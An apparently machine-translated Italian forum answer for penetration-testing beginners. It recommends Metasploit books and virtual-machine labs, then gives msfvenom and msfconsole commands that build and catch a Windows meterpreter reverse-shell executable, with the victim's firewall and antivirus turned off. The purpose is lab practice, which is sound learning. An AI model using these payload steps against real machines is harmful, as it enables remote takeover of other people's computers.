Sì, ma invece di utilizzare un software di virtualizzazione come VirtualBox o VMware per installare la macchina vittima o la macchina attaccante (non si desidera che una macchina vulnerabile sia connessa direttamente a Internet).
Leggi libri come Metasploit: The Penetration Tester's Guide , è un grande libro scritto dallo sviluppatore di Metasploit. Tuttavia, molte funzionalità di Metasploit sono cambiate rispetto al rilascio del libro e non esiste una versione aggiornata di esso.
Pertanto, consiglierei di leggere Test di penetrazione - Un'introduzione pratica all'hacking . È relativamente nuovo e un buon libro.
Impostazione Lab
Come leggerete i libri, vi guideranno come configurare il vostro laboratorio di test. Con ogni passo in dettaglio.
Il problema
I libri massimi iniziano con Windows XP, ma sfortunatamente Microsoft ha terminato il proprio supporto per Windows XP. Quindi, avrai difficoltà a trovare l'installazione di XP. Anche se riesci a trovare Windows XP, la vulnerabilità elencata nei libri verrà corretta (a meno che tu non stia usando un laboratorio di Penna-Test online, ci arriverò più tardi). Quindi dirai "A che serve leggere questo libro? ", ti insegnerà le basi delle seguenti cose," Come sfruttare le vulnerabilità note "e molti altri modi su" Come puoi compromettere un sistema ".
Nei prossimi capitoli scoprirai che sfrutteranno alcune vulnerabilità conosciute e avranno accesso al sistema e cercheranno di insegnarti qualcosa di Post-Sfruttamento (cioè cosa fare quando hai compromesso un sistema). C'è un intero capitolo su "Post-Exploitation", ma dovrai usare qualche trucchetto di Post-Exploitation di tanto in tanto.
Troverai frustrante non poter fare nulla riguardo a una vulnerabilità patchata. Qui di seguito descriverò un piccolo trucco per compromettere un computer, in modo che tu possa goderti un po 'di Post-Sfruttamento fino al prossimo capitolo.
Soluzione:
Supponendo che tu sia riuscito a trovare Windows XP e che le cose siano corrette e tu voglia goderti un po 'di Post-Sfruttamento.
Segui i seguenti passaggi:
Open a terminal
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ip of your machine) LPORT=(port you want to connect back to) -f exe > filename.exe
Trasferisci questo file sul computer della vittima e disabilita Windows Firewall e AV in quanto verrà rilevato da qualsiasi AV (non è un buon metodo per compromettere un sistema, ma per imparare un post Sfruttamento puoi usarlo). Non aprire il file attendere fino a quando non hai terminato tutti i passaggi.
Di nuovo apri un terminale e digita
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST XXX.XXX.XX.X
set LPORT XXX
run
(non chiudere questo terminale, qui otterrai la sessione meterpreter dopo aver eseguito il file sul computer vittima)
Quando hai finito con tutti i passaggi precedenti puoi andare al computer vittima ed eseguire il file exe generato.
Hoollaa! otterrai una sessione di meterpreter e ora potrai goderti un po 'di Post-Sfruttamento
Nota
1- Leggi attentamente come impostare il tuo laboratorio dal libro con attenzione altrimenti il file exe generato sopra non funzionerà.
2- Puoi ottenere il tuo indirizzo IP digitando ifconfig (tutte queste cose sono menzionate nella sezione di configurazione del laboratorio, quindi percorrila).
3- Accertati di aver inserito lo stesso valore LHOST e LPORT nel luogo specificato.
Puoi anche imparare da SecurityTube su Metasploit nella sezione Megaprimer. I video sono gratuiti da guardare ma possono iscriversi a loro e puoi accedere al loro laboratorio online. Quindi non dovrai superare tutti i problemi descritti sopra. È una tua scelta.
Spero che questo possa aiutarti.
Aggiorna
Il file sopra generato funzionerà solo per Windows. Ma puoi anche usare la distro Linux vulnerabile come metasploitable. Si tratta di una distribuzione Linux vulnerabile appositamente progettata e troverai numerosi tutorial e libri su come sfruttare metasploitable.